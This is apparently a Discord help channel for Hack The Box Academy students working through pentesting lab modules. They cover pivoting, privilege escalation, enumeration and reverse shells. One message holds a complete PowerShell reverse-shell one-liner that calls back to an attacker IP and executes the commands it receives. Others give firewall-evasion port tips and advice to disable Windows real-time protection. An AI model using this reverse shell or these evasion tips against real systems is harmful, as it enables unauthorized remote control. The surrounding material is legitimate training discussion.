#modules

1 messages · Page 269 of 1

dawn cove
#

SeImpersonatePrivilege [+] Named pipe listening... CreateProcessAsUser() failed. Error: 216

dense pewter
#

Is the SeImpersonate enabled?

#

Try whoami /priv

dawn cove
#

yes

next bronze
#

what are the tools you've tried

grand pivot
#

Hey, I found the flag for the Bypassing Security Filters under the Web Attacks module, but I cant seem to submit it successfully . I've made sure to remove all leading and trailing white spaces

Edit: turned out to be an issue with my clipboard, and I submitting the flag from the previous exercise

dawn cove
next bronze
dawn cove
#

I could not obtain the CLSID with my current privs

next bronze
#

there is already a list in the repo

empty imp
#

Which sysmon config file are you using? There should be one linked in the module that points you to a Github repo that hosts an example config.

This example config is there on the Target too. Use this.

cunning frigate
normal sand
#

Glad to hear it. Keep it up 💪

#

Thanks for clarifying.

dawn cove
dawn cove
cunning frigate
dawn cove
#

already did, its not working

cunning frigate
#

Oh dang

next bronze
#

if it works then use another way to get access other than a rev shell

#

think outside the box

cunning frigate
#

Also you can run a binary as system maybe try to use beacon or msfvenom binary

#

Also try to use ports like 443 53 445 80 so of there is firewall rules it doesn't block ( I don't remember if AEN had that)

normal sand
#

Or does anyone else know perhaps?

normal sand
#

So when setting up server.py, do we need to configure it to have credentials for the NTLM authentication. Would appreciate if anyone can confirm my understanding. Thanks.

next bronze
#

if I've read it right, the proxy server only allows connections after ntlm auth was successful. but you don't need to worry too much about this, ntlm is getting deprecated, let alone this kind of proxy, ive never seen one of those in the wild

noble hare
#

guys please teach me how to hack

#

i dont know what to start

storm elk
noble hare
#

thank u guys

storm elk
#

sure thing

open summit
agile token
#

Hello, I am new on these type of things so I didnt really get how can I use https://github.com/FSecureLABS/SharpGPOAbuse in windows, as it is not an exe file. Can anyone explain me how to do it? (it is not really necessary but I read it here https://academy.hackthebox.com/module/74/section/709)

GitHub

SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are contr...

rain garnet
#

I have a question?

Could it be possible to make your own labs instead using the attack box and target box of Hack the box?
Let say you enrolled at hack the box academy cpts?

shut vapor
#

I would argue it's crucial to play around as much as possible with the stuff.

rain garnet
#

Thanks for answering my question

rustic sage
#

Hello

rain garnet
#

The reason why I want to do this is because hack the box target box is very slow especially the windows target box. It really a burden to me slows down my studying.

fringe urchin
shut vapor
#

Well, the trade off will be that standing up your own boxes will be a whole different thing that slows you down. You do learn a lot though. Also, you'll still have to go through the modules and use their boxes to answer the questions.

#

Schainy has good advice too. Using your own kali/whatever box + VPN is better than the pwnbox IMO.

silver iris
#

Wanted to thank htb staff, that windows hosts on academy run pretty smooth now. Thanks for the improvement 🙂

silver iris
open summit
#

whats suspicious about this?

#

Also this is meant to be suspicious and it looks normal to me so

timber hatch
#

module ACTIVE DIRECTORY ENUMERATION & ATTACKS / Credentialed Enumeration - from Linux somebody: actually reprocuded the steps in the bloodhound section? ( i know you dont have to you can anser the question without)

wise vault
#

RDP and SOCKS Tunneling with SocksOverRDP in this section when i extract socksoverrdp-server.zip the .dll file auto removed what the hack is this?

#

anyone please

#

@next bronze are you still there?

#

@fathom pendant

cloud urchin
wise vault
cloud urchin
wise vault
manic spoke
#

Could anyone possibly provide a nudge on the new broke auth skill assessment? I'm on the OTP part. I have brute forced for 4 and 5 digit 2FA codes and no luck. I have also checked the requests in burp to see any hidden redirects or html information.

wise vault
#

i double checked now reset the machine

cloud urchin
wise vault
#

let see

cloud urchin
wise vault
#

ok

snow ridge
#

Does anyone know why the lab in module: ADVANCED XSS AND CSRF EXPLOITATION and in section: Misc CSRF Exploitation works differently in burps chromium vs Firefox?

I get 302 redirected when I try to access /profile.php and I cannot read flag, but in Firefox I can access it normally. I even tried restarting lab but I'm pretty confident now that it has something to do with chromium.

In walkthrough its says this "Students need to follow the redirects until they arrive at /profile.php?user=htb-stdnt, then go back to Firefox to view the page" but why I cant I view it in burps chromium?

cloud urchin
cloud urchin
# wise vault

That is not real-time protection, that is virus and threat protection. disable real time protection and you won't have a problem.

snow ridge
pallid nimbus
#

someone have done attacking common service module ? I have trouble with RDP

timber hatch
cloud urchin
timber hatch
#

yes

shut vapor
timber hatch
cloud urchin
timber hatch
#

do i need to do something at neo4j?

cloud urchin
cloud urchin
# timber hatch

Looks like the data is in there. Do a search for a user or the domain stuff should pop up inside bh

timber hatch
#

yes it appears something. thank you both 🙂 🙌
But I didn't get a graph as nice as the one in the example fingerguns

#

ah yes thx. sorry total bloodhound beginner

wise vault
#

We will need to transfer SocksOverRDPx64.zip or just the SocksOverRDP-Server.exe to 172.16.5.19. We can then start SocksOverRDP-Server.exe with Admin privileges. how is this possible ? systems have no connectivity. it should already be there 🥺 why HTB .....?

#

its really fu***** s***

fathom pendant
wise vault
fathom pendant
#

No

wise vault
#

see please

fathom pendant
#

Did you start cmd/powershell as admin?

wise vault
#

am stuck on that line

#

how to copy

#

.exe to 172

fathom pendant
#

Scroll up there's connection info on how to get to that host

#

Mstsc has a drive share option

#

You might need to click advanced options to select it

#

It's all about clicking around, or using Google

rain garnet
wise vault
#

its not accessible you mean to share it

fathom pendant
#

Yes you can share a file location

#

Or use a billion ways to share files taught in the file sharing module

pallid nimbus
#

I tried to attack SAM, LSSAS with previous modules content but nothing, no hash

#

so idk what to do

shut vapor
# pallid nimbus yep I have issue on attacking RDP

You know what, I'm sorry, I completed 'footprinting common services' which at one point involved RDP and confused it with your question about 'attacking common services'. With your question out here though I'm sure someone can offer insight into your question. 🤦

lone axle
#

Hello, new here trying to learn ctf, but I stuck on flag command, any input for me please

pallid nimbus
#

what ?

pallid nimbus
#

Anyway if someone have a clue I'll be grateful :
I'm stuck at Attacking common services - attacking RDP at the 3rd question
I know what to do, but i’ve tried to attack SAM, LSSAS from Password Attack module, and I have found 0 hash, i don’t know what to try anymore, someone can help me please ?

vagrant osprey
#

Hello, I'm trying to connect to htb through a vpn on my vm. What password do I input after using ssh htb-student@[ipaddresshere]?

#

Nvm, figured it out

vagrant osprey
#

Or not... does this step matter?

#

I have no clue what to put as the password

pallid nimbus
#

lol, idk if it was OSINT question but i found the flag, i don't think it was legit, I have no clue how to enum the hash tho

wise vault
#

last one here

#

is there need to configure something for 172.16.6.155 except 127.0.0.1:1080 in proxifier

#

i did 127.0.0.1:1080 socks5

fathom pendant
wise vault
fathom pendant
#

Yep

wise vault
#

is there need to configure more

fathom pendant
#

Shouldn't be

wise vault
#

or i should run it as admin

fathom pendant
#

I mean yeah, run as admin

wise vault
#

failed

fathom pendant
#

Are you entering the right ip?

#

And the right creds

wise vault
#

enter right ip

fathom pendant
#

All 3 hosts have different creds

wise vault
#

yes

fathom pendant
#

And you got the same popups as the examples?

fathom pendant
#

You can't run commands while the openvpn process is running

vagrant osprey
#

Opened it, but when i try to ssh i don’t know what password to put

fathom pendant
#

Look at the questions

vagrant osprey
#

did i circle wrong step

#

no yeah that section

#

after opening a new terminal and using ssh

fathom pendant
#

Above the questions should be a command to ssh to [ip] with username "htb-student" and password "insertpasswordhere"

vagrant osprey
#

is that the literal password or

fathom pendant
#

Scroll all the way down

vagrant osprey
#

doesn’t say one

fathom pendant
#

To where there's questions

vagrant osprey
#

yes

fathom pendant
#

Above the first one should be an instruction

#

That contains username and password

fathom pendant
#

¯_(ツ)_/¯

wise vault
#

hold on

wise vault
fathom pendant
# wise vault

Try resetting the target and doing the steps again

fathom pendant
wise vault
#

no way

fathom pendant
#

Also 3 hours, the internal hosts could have silently died

wise vault
#

i added time

fathom pendant
#

¯_(ツ)_/¯

wise vault
#

ok let me do something

fathom pendant
#

Often 'username:password' will be the format

vagrant osprey
fathom pendant
#

That's why there's no instructions

#

Because it's an academy version of a box, which won't have the htb-student user

vagrant osprey
fathom pendant
#

You need to follow the steps in the section

#

This is all to do with enumerating a web page

vagrant osprey
#

but can I do that without sshing in to the machine?

fathom pendant
#

Yes

vagrant osprey
#

ahh ok sweet

fathom pendant
#

It's hosting a web port on 80

#

All the nibbles sections are interconnected @vagrant osprey

wise vault
#

completed

fathom pendant
wise vault
#

sorry

fathom pendant
wise vault
#

got it 🙂

vagrant osprey
fathom pendant
#

I'm not on-demand help

wise vault
fathom pendant
#

I'm telling you my boundaries :)

#

That's all

#

Gl; hh

wise vault
fathom pendant
#

Good luck, happy hacking

wise vault
iron ibex
#

Hello dear hackers,
https://academy.hackthebox.com/module/77/section/731
None of these options redirect to https://app.hackthebox.eu/profile/overview
All the options redirect to https://academy.hackthebox.eu *
Am I mistaken or is the course outdated ?

bright coral
fathom pendant
#

^

#

This section doesn't apply to academy

iron ibex
#

Or should I treat those as different websites ?

fathom pendant
#

They are separate websites

iron ibex
#

ok

fathom pendant
#

You can 100% academy and still be "noob" in app

#

App progress is via active boxes and challenges

iron ibex
#

OK that's what I just figured

#

app is exercices and "real word" practice, academy is courses

fathom pendant
#

👍

rain garnet
#

Hellow htb expert dudes. Anyone know how to setup openvpn on the target windows box ?

fathom pendant
#

You don't run openvpn on the targets

rain garnet
#

Windows target box on cpts module slow as F.

fathom pendant
#

You run openvpn on your system to connect to targets

rain garnet
#

Nope. I have problem with the Windows target box slow as F

fathom pendant
fathom pendant
rain garnet
#

Any module that had a windows box target

fathom pendant
#

That's kinda agnostic of it being part of the CPTS path

rain garnet
#

Is Really sucks.. htb should fix this. Hope htb can read this and improve their service.

fathom pendant
#

Message support whenever you're affected by it

rain garnet
#

Paying high amount of money. Not a joke

fathom pendant
#

Support doesn't monitor the discord

#

Lots of people pay a decent amount of money

rain garnet
#

They have too.

fathom pendant
#

No, they don't have to

compact patrolBOT
fathom pendant
#

HTB doesn't pay support staff to monitor the discord, occasionally one may be on the discord to chat with -- but that's few and far between

rain garnet
#

They have to hear their end users customer because that is how they make money.

fathom pendant
#

They do. Just via their actual support methods and there's also now the /feedback command, that gets sent to HTB

#

But complaining on the discord literally does nothing

#

I'm telling you how to get in contact with someone that can help you on the HTB staff end

rain garnet
#

Ok thanks for your advice. Screw them up. Took my money and offer me bad service. Really disappointed.

fathom pendant
#

it works fine for me ¯_(ツ)_/¯

#

I also gave you a couple quick and easy troubleshooting options

#

Change vpn regions, use the tcp download instead of udp download

rain garnet
#

I l hope that will work for my end but unfortunately is not. Thanks for your kindness.

fathom pendant
#

then reach out to support ¯_(ツ)_/¯

#

As stated, support is here rarely

iron ibex
#

Been a few weeks in academy.htb.com, but first time using app.hackthebox.com
Unless I am mistaken, I am supposed to have spawned a PwnBox from which I should be able to hack the target machine...
But I don't find any way to actually see the VM or enter it, what am I missing ? 🤔

fathom pendant
#

The app pwnbox is different from the academy one

#

And is time-limited for free users

#

2 hours for the lifetime of the account

#

The academy restrictions are:
Limited internet
One spawn per day

iron ibex
fathom pendant
#

You don't have to do an app machine rn btw

iron ibex
acoustic owl
fathom pendant
iron ibex
fathom pendant
#

Progress on app and progress on academy are separate

#

You can stop the machine and close the pwnbox

#

Also for starting point machines they have their own section #starting-point

#

Where are you seeing it tell you to do a starting-point machine btw?

iron ibex
fathom pendant
#

I'm asking where in the academy page that you were on does it tell you to do starting point

#

Starting-point is not linked to academy progress

fathom pendant
#

That's a suggestion

#

Not a requirement

iron ibex
#

I thought it would make sense to do the Starting Point before actually doing the easy box

fathom pendant
#

"Here are some ideas"

iron ibex
#

I got it, so if I want to do it aswell, I'll need to suscribe to app

fathom pendant
#

Yes

#

But doing those is not a necessity

#

That checklist is just an example

#

Especially the battlegrounds one as no one really is on battlegrounds

#

If you're doing the cpts(pentester) path, you'll gain a lot of the skills along the way

iron ibex
fathom pendant
#

For cpts, yes

iron ibex
#

So I don't have to worry about app section ?

#

Thanks for your advice

fathom pendant
#

It goes through the basics of footprinting and attacking basic services

#

It doesn't go too deep on the web end

dim wolf
#

interestingly enough the last section of AEN suggests to complete Starting Point

marsh plank
#

Hello, I try to use the academy and beat "Nibbles" but as soon as i input the right creds in the admin page, it wont load anymore

acoustic owl
marsh plank
#

vpn

fringe urchin
marsh plank
fathom pendant
marsh plank
#

thank you ❤️

regal cliff
#

Hi

#

Little bit stuck on Web Services and API's module

hexed lintel
#

Why am i getting permission denied in dcsync attack.

fathom pendant
rustic sage
#

Hello I am currently on the knowledge check of Getting Started. I was able to obtain the hash and crack it to now sit in the admin section of the web service. My question is: is it normal that the upload button is not working or is this on my end? Thanks

strange forge
#

linux privesc skill assesment- stuck at flag2. esc from htb-student to tomcat. nothing seems to be working. user is not in sudoers. setuid does not popup anything worth for gtfobins

fathom pendant
rustic sage
#

Thanks for clarifying

rustic sage
#

Got it! Can upload now. Awesome

compact patrolBOT
open summit
#

where do i spawn in my machine from HTB

#

i dont know why the spawn machine option has dissappeared

bright coral
open summit
bright coral
fathom pendant
late moth
#

I am on the "Network Enumeration w/ Nmap" module on the final task "Firewall and IDS/IPS Evasion - Hard Lab". I have ran nmap with sudo privileges //syn scan and am only returning open ports 22, 80. Port 53 UDP is open, Port TCP//53 is filtered. I have tried -sV and -sC to try and enumerate the services but I am coming up short. I am running Nmap version 7.93. I have also tried to spoof my source port to port 53. Any guidance?

open summit
#

go back to the section before the easy lab

#

read the section at the end

late moth
#

i think i got it.

#

thanks

fathom pendant
#

Did you add -p-?

late moth
#

i did. I was missing a port tho on my initial. I apperciate it!

fathom pendant
#

:D gl

strange forge
#

can anyone help with linux priv esc skill assessment. stuck at flag2 hours now. not able to esclate. whta i have checked-

sudo - don't have sudo rights so cant run sudo -l too

setuid - none of the binaries have gtfo exploit. (if any of these is way then please tell, will dig deeper into this)

cron jobs- found a cronjob e2scrub_all

#

also checked for kernel based exploit. although sudo version is vulnerable. but as current user cannot perform sudoedit.

atomic briar
#

for anyone doing the windows server, "Dealing with End of Life Systems", I couldn't get my usual xfreerdp command to work so I used this instead:
xfreerdp /dynamic-resolution /compression-level:2 /u:htb-student /p:HTB_@cademy_stdnt! /v:IP /cert-ignore /sec:rdp

atomic briar
nova idol
#

I stuck in broken authentication-skill assessment any one have advice or tip?

#

I stuck in 2FA OTP

strange forge
atomic briar
#

not to sound like yoda, but you don't have to pretend to be that user, be that user!

strange forge
atomic briar
#

what's the very first thing you do when you pop a shell on any machine?

#

(possibly second after whoami)

strange forge
#

to check for groups

#

then sudo -l

fathom pendant
#

ls

#

Perhaps

atomic briar
#

ok third hahhah

strange forge
#

pwd

strange forge
# atomic briar ok third hahhah

how does ls come into picture? i mean i cannot read bash-history too. if u dont mind can we talk in dm. a lot of spoilers can get dropped

#

ohh

odd grail
#

Hi Everyone, I'm having difficulties understanding this paragraph

"Penetration Testers will configure reverse proxies on infected endpoints. The infected endpoint will listen on a port and send any client that connects to the port back to the attacker through the infected endpoint. This is useful to bypass firewalls or evade logging. Organizations may have IDS (Intrusion Detection Systems), watching external web requests. If the attacker gains access to the organization over SSH, a reverse proxy can send web requests through the SSH Tunnel and evade the IDS."

So would the reverse proxy be to receive a connection from inside the organization's network?

#

Also, does 'external web requests' means outgoing or incoming web requests?

strange forge
strange forge
daring birch
# odd grail Hi Everyone, I'm having difficulties understanding this paragraph "Penetration ...

essentially the attacker is clocking itself as being a reverse proxy on the compromised endpoint. Essentially listening in on the port of communication and relaying that info or connection back to the attacker. It evades the IDS/firewall due to the endpoint being trusted by the network and they don't know it's been compromised, plus all they would see is the encrypted SSH traffic, not the specific web requests.

odd grail
#

Thankyou guys, I get it now, so it is relaying information back to attacker

#

gotcha

shut quest
#

<@&861185840277487616> ^^^

daring birch
#

?

fathom pendant
oblique flume
#

hey guys i need help w a reverse shell

#

i did everything but the netcat listener isn’t picking up the shell

fathom pendant
#

Make sure you're using the right LHost

oblique flume
#

i’ve tried multiple ports

fathom pendant
#

172.16 can't speak with 10.129

oblique flume
#

it’s supposed to be my own boxes tun0 address right ?

fathom pendant
#

What section?

oblique flume
#

shells and payloads

#

reverse shell section

fathom pendant
#

Then yes, lhost should be your tun0

#

If using metasploit

oblique flume
#

yeah that isn’t working

#

and i’m getting my payload from revshells so ik it’s correct

#

i’m not sure what else i’m missing

fathom pendant
#

I suggest using the powershell payload from the section

#

And replacing the relevant ip and port

oblique flume
#

that was the first one i tried

#

that’s why i ended up going to revshells

fathom pendant
#

It should work

oblique flume
#

but it’s the same one essentially

fathom pendant
#

All you gotta do is replace the ip and port

oblique flume
#

lol i did

#

the shell works

#

the listener just isn’t catching

#

the code executes successfully

fathom pendant
#

Then the shell isn't working

#

Copy your code here and wrap it in backticks
`like this`

oblique flume
#

‘powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.15.61', 777);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"’

fathom pendant
#

That's a quote, not backtick

oblique flume
#

ohhh sorry hold on

#

powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.15.61', 777);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"

#

using sudo nc -lvnp 777 for the listener btw

fathom pendant
#

As stated in the section, run the given command from command prompt

oblique flume
#

where does it say that ?

#

the whole lesson has been in powershell

#

but i’ll try it

#

ofc it worked …

#

well thank you

#

srry to waste your time😭

fathom pendant
#

"On the Windows target, open a command prompt & copy and paste this command"

oblique flume
#

are you sure you’re on the same section? mine literally does not say that …

#

mine says “Try running some standard windows command to practice a bit”

fathom pendant
#

"Connect to the target via RDP and establish a reverse shell connection" is the question yeah?

oblique flume
#

yes

fathom pendant
#

<@&861185840277487616> preemptive ping considering the names that are typing

fathom pendant
oblique flume
#

okay i see it, thank you . so what is the difference between ps and cmd ??

fathom pendant
#

This launches a powershell that will basically run in the background

#

I also believe cmd interprets things differently than ps

rustic sage
fathom pendant
#

¯_(ツ)_/¯

oblique flume
#

@rustic sage okay

rustic sage
#

In my country we have a saying that roughly translates to
"Give a man a fish and youll feed him for a day, give a man a finishing rod and youll feed him for life" i wanna give that man the fisging rod

fathom pendant
rustic sage
#

I just had pineapple pizza, and i LIKED it

fathom pendant
#

"With all due respect" is a bit of an oxymoron

fathom pendant
#

Also I guess the language filter is broken or you're bypassing it in some cheeky way

#

You do realize they have logs yeah?

#

Bots log what something was said before it was edited

rustic sage
#

Yes, i do, i just dont want it to be so boring for the mods

#

Anyway see you in hell

fathom pendant
#

Go have fun pleasuring yourself with a cactus

#

@rustic sage

digital vessel
#

this is a basics "metasploit" thing

fathom pendant
#

?

#

I've had no issues with it in the past

#

el* exploit?

digital vessel
#

i have tried 4 victim machines

#

yes that one

#

i have pictures if you want me to pm them or w/e showing commands proof of solve at this point im doing it to learn but its not playing nice.

fathom pendant
#

What exactly is it you're having issues with? You're properly backgrounding the shell yeah? Ctrl-z after it executes

#

And no, I'm not taking pms

#

You can follow #welcome to be able to post images

digital vessel
#

it will not load the page : so you cannot even find its el* then it will not run exploit

digital vessel
fathom pendant
#

I'm running through it now to verify if it's a you issue or a lab issue

digital vessel
#

that's all i want ^^

fathom pendant
#

Worked fine for me

#

Got both the expected exploit and the expected escalation working

fathom pendant
#

Also make sure http:// not https

digital vessel
#

i did

fathom pendant
#

It loaded just fine for me though

digital vessel
#

for me if i load its just solid white curious

fathom pendant
#

Do you have a title in the html or is it just loading

digital vessel
#

nope nothing

#

just pops open then hangs

fathom pendant
#

Then I suggest changing vpn regions and trying again

digital vessel
#

i'll be generic but

find (name)
set lhost
set rhost
use number
run
i get this msg >

exploit aborted due to failure: unexpected-reply: Upload was not successful
[*] Exploit completed, but no session was created.

fathom pendant
digital vessel
#

ok

#

i'll give that a shot ty

fathom pendant
#

Also curious; if you do ip a do you have multiple tun ips

#

Like tun0, tun1, tun...

#

If so, that could also be a cause

#

Also running pwnbox and your own vm can also be an issue

digital vessel
#

nope

#

its a bare metal kali fresh

fathom pendant
#

Anyway

#

Staff doesn't monitor this chat

#

Your best bet if you want to reach staff is to use the support chat on the website

digital vessel
#

ok ty will do apprecate you =3

digital vessel
fathom pendant
#

Ye usually it's a 60/40 on skill issue/lab issue

#

Always keep in mind the basic troubleshooting and it's ez

green peak
#

https://academy.hackthebox.com/module/147/section/1335
The target is running a vulnerable version of sudo (1.8.3), so I attempted to use Metasploit's sudo Baron Samedit exploit. However, I never received the reverse shell. The exploit does indicate that it has completed, but nothing else happens. I have ensured that the exploit options are correct and that the shell session is compatible with the exploit.

autumn pilot
#

If that was not taught throughout the module, then it is not the appropriate way to move forward

green peak
#

i have completed the lab the module way but was just wondering why won't the exploit work though

rustic sage
#

I had issues with that too, I moved on from it and will revisit later on, by memory a library issue was the reason?

green peak
#

ohh exploit does require a specific version of libc i think

eager ledge
#

I am trying to do pivoting.

Here is the scenario.

  • I have my attack machine A, which is a Linux machine.
  • From this attack box, I can access machine B which is also Linux machine.
  • From machine B, I can access internal Windows machine C through RDP
  • From machine C, I can access Windows machine D through RDP.

Now, I need to perform a nmap scan on machine D. The nmap tool is only present on the attack box A. I set up a chisel proxy server on C so that the traffic on 1080 port of B is tunneled dynamically to D through C. I also set up static port forwarding such that the traffic on 1080 port of A are forwarded 1080 port of B. I configured proxychains to route the traffic through 1080 port on A. I then used proxychains to run the nmap command as
proxychains nmap -sT -v -Pn --top-ports 20 D -oN D.nmap
I know for sure that RDP is running on D, but the scan shows the 3389 port as closed. How should I approach this situation?

rustic sage
#

is it routing through port 9050 or 1080?

eager ledge
#

1080 localhost port

rustic sage
#

Ok so your 127.0.0.1 9050 is # out in your conf file?

#

Chisel server is running on the linux target

shut willow
#

Im confused, it telnet just very unsafe since you can get in with any random password?

rustic sage
#

telnet is considered unsafe because it transmits in cleartext

eager ledge
#

This creates a tunnel.

rustic sage
#

A=pwnbox/vm B=Ubuntu C=Windows D=DC, correct?

eager ledge
#

Yes

rustic sage
#

Ok, have you tried this as a reverse pivot with chisel?

#

"There may be scenarios where firewall rules restrict inbound connections to our compromised target. In such cases, we can use Chisel with the reverse option."

eager ledge
#

I tried this. But this is one more level of pivoting so not working

rustic sage
#

Which section is this one? Just so I can go back to it

eager ledge
#

This is not required by any of the exercises. I was just curious.

rustic sage
#

Right

pine dune
#

I'm on the easy footprinting assessment lab

im watching a walkthrough on how the person got access to it using ftp

but the way he did it is weird, its like he knew the username ("ceil") and htb doesn't tell us how to enumerate usernames for ftp

and he didnt do it either, he just ran an nmap scan

#

and then he did ftp ceil@ip

acoustic owl
pine dune
#

my nmap scan

#

doesnt show the username anywhere

stable bone
#

hi menace bunny

next bronze
# pine dune

there are flags you can used with nmap to get you more info

pine dune
#

this is the scan of the video...nowhere does it say "ceil"

pine dune
#

as well

acoustic owl
pine dune
next bronze
#

what are you trying?

#

I don't think there's much to be spoiled for that assessment

#

just the general techniques will do

#

yeah so just what you've tired will do

pine dune
#

(Ceil's FTP) found it bruh

pine dune
next bronze
#

that's SA1 yeah? there no need for DACL abuse for that

pine dune
acoustic owl
next bronze
#

which question is that for?

#

yeah which questin in that assessment

#

oh wait trust attack, my bad I saw assessment 1 and thought it's part 1 of the tier 2 AD module

#

ok dm

pine dune
#

Hi guys, I managed to find the ftp user for a login but cant seem to find the password. In the video that I'm watching, the guy managed to enter the password from the nmap scan (evidentally) which is weird

acoustic owl
pine dune
#

i have ran this script

#

nmap --script ftp-brute -p 21 <target-ip>

#

but its been on that for like the past 20 mins

acoustic owl
pine dune
#

can someone pls help 😦

acoustic owl
pine dune
eager ledge
acoustic owl
patent flower
#

Hello everyone,

I'm stuck at the question “What is the admin email address?” footprinting/imap-pop3

I logged on to robin, tried to read some mail, but no mail present.

I've been looking for a day

wise vault
#

hi

#

am just stuck on @172.16.6.45 there is no rdp but i can ssh but creds of vfrank are not working for this

#

am on pivot final skill assessment

#

anyone who solved it

#

i can rdp to 6.25 i completed it

pine dune
wise vault
#

@normal sand hi are you there?

pine dune
patent flower
pine dune
#

i think if u use the -a flag it should show something

digital ore
#

hey guys have anyone finished the dacl II module ?

patent flower
pine dune
#

cant remember how I did it

pine dune
#

but u gotta look at the info carefully

#

just look for the @ in the results

high walrus
#

how to solve this , tried alot no idea

#

nevermind fixed it

wise vault
#

anyone who completed pivoting module

normal sand
wise vault
normal sand
#

What's up?

wise vault
#

mate where are you on the pivot module?

#

can i dm

normal sand
#

Section: Web Server Pivoting with Rpivot

normal sand
wise vault
normal sand
wise vault
#

keep it up mate

#

you will

#

@next bronze hi mate are you there

patent flower
pine dune
normal sand
#

@wise vault Can I DM you? Need some help.

normal sand
#

I've tried using curl and went through the source code, still nothing.

#

I can DM someone a screenshot, can't send it here since it'll be a spoiler. Please lemme know if you can help with this.

haughty tree
hoary pulsar
#

anyone here know how to fix this type of issue?
When Pivoting
Tried doing the "proxychains nmap -sT <internal ip> -p 445"
result is the attached pic

But in the Module doing this command resulted in an open port
.
Currently Using a eu-vpn not pwnbox
Using a pwnbox also shows a result of an open port as well

next bronze
#

disable ping when scanning through proxychains

hoary pulsar
#

shows filtered, err no way that i need to use evasion or stealth scan in here :<

normal sand
haughty tree
normal sand
hexed lintel
#

how can i get ip of Academy-ea-ms01 so that i can establish winrm session

next bronze
autumn pilot
#

pay attention to detail, it is under your nose

zenith canopy
#

module - Attacking common services, why do we turn off smb in responder and how does ntlmrelayx relays credentials to other computer ?

zenith canopy
round moat
#

hey guys!! am stuck at two questions. Please help me!!

  1. Footprinting -> DNS
    Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...))
#
  1. Footprinting -> SMTP
    Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
    I used smtp-user-enum -M VRFY -U footprinting-wordlist.txt -t <ip>
#

still it says 0 result what should I do?

zenith canopy
zenith canopy
round moat
zenith canopy
zenith canopy
round moat
#

plz try and say am getting 0 results with the command i said

balmy iris
#

Hello, I need some information about
LINUX PRIVILEGE ESCALATION - Privileged Groups
As said in this part of the module, I looked for cron jobs in the syslog part. The job started as root could be modified so I did it. I am now root of the box and it looks like this was an unintended way of doing things as the flag is nowhere to be found and I can retrieve md5sum of flags from later sections of this module

#

Is there something I missed?

thorn hawk
round moat
thorn hawk
balmy iris
#

If I remember well SMTP had this issue

#

Where you had to change userlist in order to find something

round moat
balmy iris
#

I don't remember which one but can try SecLists/Usernames/xato-net-10-million-usernames.txt

round moat
#

okay let me try this

balmy iris
#

Or was there any user list in the module section ?

thorn hawk
#

from my notes it is the right wordlist, I was having the same issue as well but increasing the timeout I was able to get the answer.

round moat
#

naah, it said to use the same worldlist from the resources, and am trying the same thing as @thorn hawk

#

thanks @thorn hawk it did worked.

balmy iris
#

Well the username is in the list, mb

thorn hawk
round moat
#

now will try of DNS too

next bronze
#

you need responder to poison the requests so that they will get redriected to your ip, but ntlmrelayx also need to be able to receive the requests to relay them

zenith canopy
next bronze
#

kinda, ntlmrelayx is already listening, it just needs the requests to come in so that they can be relayed elsewhere

#

if responder is also running the smb server then it can't listen on the smb ports

#

I usually just start ntlmrelayx before responder so that I don't have to modify the config but YMMV

zenith canopy
next bronze
#

probably out of scope, there's always the ntlm relay module

zenith canopy
round moat
#

What is the FQDN of the host where the last octet ends with "x.x.x.203"?
Help me with this

tight wigeon
#

@round moat use dig within the specific zone then grep the value

round moat
#

am not getting any output

round moat
#

i used dig @ip internal.inlanefreight.htb axfr and got certain ouput

#

but it doesnt have exact ip related to 203, the close one is
mail1.internal.inlanefreight.htb. 604800 IN A 10.129.18.200

fathom pendant
#

Try using the showcased tool

chilly dove
#

Hey everyone

#

I have strange bug

fathom pendant
#

Bring it up with support

#

If it's htb related

chilly dove
#

@fathom pendant should I go to support with this one

fathom pendant
#

That's not a bug, you need to replace the port numbers with PORT

#

Also; spoiler so delete

#

Bro

chilly dove
#

PORT 53903

fathom pendant
#

Spoiler

#

And I mean replace it with the literal word PORT

round moat
#

dnsenum --dnsserver 10.129.42.195 --enum -p 0 -s 0 -o subdomains.txt -f fierce-hostlist.txt internal.inlanefreight.htb
I tried this but still cant figure it out

chilly dove
#

AA thanks @fathom pendant

fathom pendant
chilly dove
#

Will try now anyways thx

fathom pendant
#

The answer key doesn't know the port# that's spawned

chilly dove
#

Working you are wizzart

#

@fathom pendant thanks a lot

fathom pendant
#

I mean

#

The hint I believe tells you

chilly dove
#

Yep it's a bit strange before we always use actually port

#

not hardcoded word PORT

#

will be reading hint more accuraty now

fathom pendant
#

Well how would the answer know what random port gives the answer

#

The backend answer key isn't tied to the front end spawn

chilly dove
#

I think the VM wich i used from browsr

fathom pendant
#

That. Doesn't matter

chilly dove
#

connected with backend

#

Interesting anyways will now it

fathom pendant
#

The in-browser vm connects to the vpn, like you would with your own vm

chilly dove
#

yep I mean in general its connected

fathom pendant
#

Loosely

chilly dove
#

because we can simply search the answer in google

fathom pendant
#

The backend answers are hardcoded

chilly dove
#

Hmm okay I though not

#

anyways thanks

craggy grove
#

hey there I have a question: I'm working on this Windows Event Logs module and when I RDP into the machine to see the event logs, the machine is so zoomed in I can hardly do what I need to do. How can I make this easier to use?

